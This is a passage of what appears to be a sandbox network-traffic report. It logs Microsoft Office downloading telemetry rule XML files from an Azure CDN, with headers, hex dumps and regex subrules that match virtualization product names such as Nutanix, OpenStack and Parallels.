                      2024-12-03 16:51:52 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      65192.168.2.64978313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:51 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:52 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:52 GMT
                      Content-Type: text/xml
                      Content-Length: 419
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                      ETag: "0x8DC582B9C710B28"
                      x-ms-request-id: b6bf5bce-301e-0052-1df3-4465d6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165152Z-174f7845968psccphC1EWRuz9s00000016ag00000000wnh9
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:52 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                      Session IDSource IPSource PortDestination IPDestination Port
                      66192.168.2.64978413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:52 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:52 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:52 GMT
                      Content-Type: text/xml
                      Content-Length: 477
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                      ETag: "0x8DC582BA54DCC28"
                      x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165152Z-174f7845968xr5c2hC1EWRd0hn0000000r0g00000000k83b
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:52 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      67192.168.2.64978613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:54 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:54 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:54 GMT
                      Content-Type: text/xml
                      Content-Length: 477
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                      ETag: "0x8DC582BA48B5BDD"
                      x-ms-request-id: b1291b2a-001e-0028-31ae-43c49f000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165154Z-174f7845968zgtf6hC1EWRqd8s0000000z80000000002sg9
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:54 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      68192.168.2.64978813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:54 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:54 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:54 GMT
                      Content-Type: text/xml
                      Content-Length: 472
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                      ETag: "0x8DC582BB650C2EC"
                      x-ms-request-id: a15be10d-401e-0029-636c-439b43000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165154Z-174f7845968j6t2phC1EWRcfe800000016a000000000nh7k
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:54 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      69192.168.2.64978713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:54 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:54 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:54 GMT
                      Content-Type: text/xml
                      Content-Length: 419
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                      ETag: "0x8DC582B9FF95F80"
                      x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165154Z-174f7845968jrjrxhC1EWRmmrs00000016c0000000009bqs
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                      Session IDSource IPSource PortDestination IPDestination Port
                      70192.168.2.64978513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:54 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:54 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:54 GMT
                      Content-Type: text/xml
                      Content-Length: 419
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                      ETag: "0x8DC582BB7F164C3"
                      x-ms-request-id: 5470b825-901e-0048-1e08-45b800000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165154Z-174f7845968xlwnmhC1EWR0sv800000015yg00000000rzqv
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                      Session IDSource IPSource PortDestination IPDestination Port
                      71192.168.2.64978913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:54 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:55 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:55 GMT
                      Content-Type: text/xml
                      Content-Length: 468
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                      ETag: "0x8DC582BB3EAF226"
                      x-ms-request-id: 67222812-801e-00a0-09a9-422196000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165155Z-174f7845968j6t2phC1EWRcfe800000016cg00000000a6yf
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:55 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                      Session IDSource IPSource PortDestination IPDestination Port
                      72192.168.2.64979013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:56 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:57 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:57 GMT
                      Content-Type: text/xml
                      Content-Length: 485
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                      ETag: "0x8DC582BB9769355"
                      x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165157Z-174f7845968glpgnhC1EWR7uec00000016e000000000487w
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:57 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      73192.168.2.64979313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:56 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:57 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:57 GMT
                      Content-Type: text/xml
                      Content-Length: 427
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                      ETag: "0x8DC582BB556A907"
                      x-ms-request-id: 4e3832d9-101e-005a-31c5-43882b000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165157Z-174f78459685m244hC1EWRgp2c00000015z000000000r6uk
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                      Session IDSource IPSource PortDestination IPDestination Port
                      74192.168.2.64979213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:56 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:57 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:57 GMT
                      Content-Type: text/xml
                      Content-Length: 470
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                      ETag: "0x8DC582BBB181F65"
                      x-ms-request-id: b69fee9c-d01e-0028-6253-437896000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165157Z-174f7845968glpgnhC1EWR7uec00000016a000000000np3h
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:57 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      75192.168.2.64979113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:56 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:57 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:57 GMT
                      Content-Type: text/xml
                      Content-Length: 411
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                      ETag: "0x8DC582B989AF051"
                      x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165157Z-174f7845968qj8jrhC1EWRh41s000000168g000000000svz
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:57 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


